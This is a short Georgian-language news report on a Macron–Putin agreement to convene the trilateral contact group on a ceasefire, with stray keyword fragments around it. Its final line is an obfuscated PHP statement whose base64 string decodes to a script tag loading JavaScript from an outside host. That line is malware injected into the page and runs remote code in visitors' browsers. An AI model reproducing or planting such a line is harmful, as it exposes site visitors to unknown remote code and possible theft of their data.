celsiusi
ავერსი საქკაბელი
საფრანგეთის პრეზიდენტი ემანუელ მაკრონი და რუსეთის პრეზიდენტი ვლადიმერ პუტინი შეთანხმდნენ, რომ „ინტენსიურად იმუშავებენ სამმხრივი საკონტაქტო ჯგუფის შეხვედრის ჩატარებაზე მომდევნო რამდენიმე საათში“. ამის შესახებ ელისეს სასახლის მიერ გავრცელებულ ინფორმაციაშია ნათქვამი.
 
ელისეს სასახლის განცხადების თანახმად, შეხვედრის მიზანი იქნება „ყველა მხარის მხრიდან ცეცხლის შეწყვეტის ვალდებულების აღება შეხების ხაზზე“.
 
განცხადების თანახმად, ორი ლიდერი შეთანხმდნენ, რომ საჭიროა „პრიორიტეტი მიენიჭოს არსებული კრიზისის დიპლომატიურ გადაწყვეტას და ყველაფერი გააკეთონ მის მისაღწევად“.
 
საფრანგეთის პრეზიდენტმა განაცხადა, რომ „ინტენსიური დიპლომატიური მუშაობა“ განხორციელდება „უახლოეს დღეებში და კვირებში“. ასევე შეხვედრას გამართავენ საფრანგეთისა და რუსეთის საგარეო საქმეთა მინისტრები.
 
სამმხრივი საკონტაქტო ჯგუფი უკრაინის, რუსეთის ფედერაციის და ევროპის უსაფრთხოებისა და თანამშრომლობის ორგანიზაციის (ეუთო) წარმომადგენლებს მოიცავს.
772
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");